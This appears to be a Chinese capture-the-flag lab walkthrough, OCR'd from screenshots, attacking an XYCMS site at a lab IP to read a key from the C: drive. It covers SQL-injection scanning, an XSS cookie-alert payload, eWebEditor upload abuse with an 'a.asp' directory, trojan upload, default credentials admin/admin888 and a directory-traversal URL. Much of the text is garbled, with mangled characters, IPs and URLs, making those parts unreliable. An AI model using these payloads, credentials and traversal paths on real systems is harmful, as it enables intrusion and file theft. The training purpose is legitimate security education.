题目21：网站漏洞攻击之XYCMS企业建站系统

1、关卡二叶题目:网站漏洞攻击之XYCM企业建站系统描述：公司搭建了门户网站，使用了 XYCM企业建站系统。但是经过 一段时间的运营，发现公司网站经常受到黑客的攻击， 给公司 造成了很大的不便和损失。上级领导要求尽快查清原因，作为 网络安全维护人员，请查找公司网站可能存在的一些漏洞至少 两个。答案提交：1、请提交获取的key值。参考步骤：1.进入关卡二H一，点击查看IP地址获取靶机IP0关卡21弘 ，（本题60分）题目100 :网站漏洞攻击之XYCM 5企业建站系统公司搭建了门户网站.使用了巾匚峪企业建站系统.但是经过一般时间的运营，发现公司网站经常 受到黑客的攻击，给公司造成了很大的不便和损失。

2、上级领导要求尽快查清原因，作为网络安全 维护人员, 请查找公司网站的漏洞.并监证此漏洞是否可以查看网站上的重要文件.提示！重要文件存放在C盘根目录下.请以获取到的内容作为key值进行提交。2.获得的靶机IP地址3.打开场景工具Window Xp渗透攻击机4.进入xp渗透攻击机，打开浏览器浏览将要攻击的网站壮匚ms企业建站系统物3欢迎您？同站踵码开发、篌板制作、页面量计、网站tr首更学校资讯学校宜分 开班信息 特调项目 箭资团队学员作品在线报名学才费科172.16 1 62/dir url Spid=125.SQL注入使用“啊Dft入工具”对网站进行漏洞测试注入检恻检测网址 http：/172

3、16 1.62/XYCMS企业建站系统VT. 3双迎您，网站整码开发.模板制作、扫描注入点管理入口检测浏览网页会员登陆跃教育http;/www. yuleroom. cn在在线购买首页学校限讯学校借介开班信息培调项目拜贤团以P搜索I可用注入点IQhttp：/LT2. 16. 1.62/ comm on. asp?i d-1 http：/1T2. 16. 1. B2/shcwnew. asp?id-Bl http:/1T2. 16.1,62/showgkk. asp?i4=4 http：/172 16. 1.52/showkUx. up?idt2 http：f/172.16.1, BE/show

4、team. aEp?id=35 http: /172. 16. 1.62/shcwpxxin. asp?id=24 http：/lT2. 16.1.62/showjcyip. asp?id.=35 http7/172. IB. 1, aS/ahowzsjz. up?iT hUp：/lT2,16. LBE/shwjyzd, isp?i9 http：/172. 16. 1L 62/ show download. asp?id=19D啊D注入工具v2. 32增强版 暗组技术论坛Http：/vw. darkst. coa相关工具设置连瓦关于继续对注入点进行SQ注入，但没有发现可利用的信息，表明此处无漏

5、洞.XSSS洞禾I用（1）在留言本-留言标题中插入xsS?本,window.alert(document.cookie);*济西色脓:山茹博写，姓名：整访崎，方侵立乐，网友不含必开丹由信身场削崎H帅瀛同队联系电话:方偎电谢琅，网天不含心开*联系由询；必通耳，内热(L铠原欣，闷更不会必开KYCMS他业碰站系浣ASP+ACCESS+HTML是否龌L叶舌 是培艇承r可制罚不存卿ft界示I部前艮示*留莒内容;性京*息三都更亏南京XYCM。瑚 www. yul 0 polif. Wk 返回带有cookie的提示窗CfiE企业流站事虢V2. 3%即总:网砧费码开发、机板制作、靠面设计，网拈订aS：加454

6、1cl493工加噩年拈嶷技让建他叱有单Ip(r篇)3列褰.编辑器漏洞利用(1)利用编辑器漏洞进行在网站上生产a.asp目录http:2/admin/xyewebeditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=a.asp C O 172.16. L 62/admin/KyeWebEditor/adjuin/upload. asp?action=saveAtype=imag, 1轻松上手 小编推荐应用常用网站I二I从工E中导入Copyright 0 2003-2000 TLEdi tor net eTcnt All R

7、ights Ksservtdservieoft(2)编辑器管理界面的路径默认: HYPERLINK 2/admin/xyeWebEditor/admin/login.asp 2/admin/xyeWebEditor/admin/login.asp在浏览器中打开此地址iXTCMS企业建站系统VZ. 3蝴ebEditw在线编辑器-JG O 1724 16.1. 62/admin/xyeWebEdltor/adnln/login. asp。轻松上手片小编推荐应用 口常用网站 口从工E中导入(3)输入ewebeditor默认用户名admin密码admin88瞪录管理如下:/ C Q 172.16.1.

8、 62/admin/xyeWebEditor/admin/default aspe轻松上手r小编推荐应用i常用网站口从工e中导入T想让Google Chrome浏览器保存您的密码吗？保存密码| 此网站一律不保存密码当前位置;后告管理首页版权所有:主页地址;联系方式;eIebEditr 5 5版枳、富用联系方法、技术支普*WebEditar Versi on 5. 5 for ASF 简体中文商业版已获得国嘉版权局加发的讨算机软忤著作权登记证书，登记号：狗。4EMS549NebEditor中文站w*w. eWebEditor. net客服中心 Qeryi ci. cWqbEdi tor. iu电

9、话传真：口591 畤3633593典；569800 邮短件支服务器名-172. 16. 1.62服务器工P :HE. 16, 1.62服务器端口二90服务卷时间：2014-11-19 0:45:34HS版本：Microso.ft-IIS/6. 0服翁器操作系统：仙。数据对象：-i支米FSQ文本文件读写：4支手Strem文件流：支书Microsoft XMLHTTP ； J 支卜Microsoft. XHLDOH； 7 支主CD0NTS 虚拟SMTF发 信：然后就可以对样式进行管理上传自己制作的木马程序(4)编辑器默认目录遍历地址： HYPERLINK 2/admi

10、n/xyeWebEditor/admin/upload.asp?id= 2/admin/xyeWebEditor/admin/upload.asp?id=1&d_viewmode=list&dir=./并在浏览器中打开此地址 G O 172.16.1. 62; idiiin/xyeWebEditor/adjiiin/upload. asp?id=l&d viewode=listiL&轻松上手 f 小煽推荐应用 常用网站 口从期中导入(5)利用编辑器默认目录遍历漏洞 HYPERLINK 2/admin/xyeWebEditor/admin/upload.asp?id= 2/admin/xyeWebEditor/admin/upload.asp?id=1&dviewmode=list&dir=./././访问到C盘根目录获取的key口o*1日刽首页上一页共10个页次：1/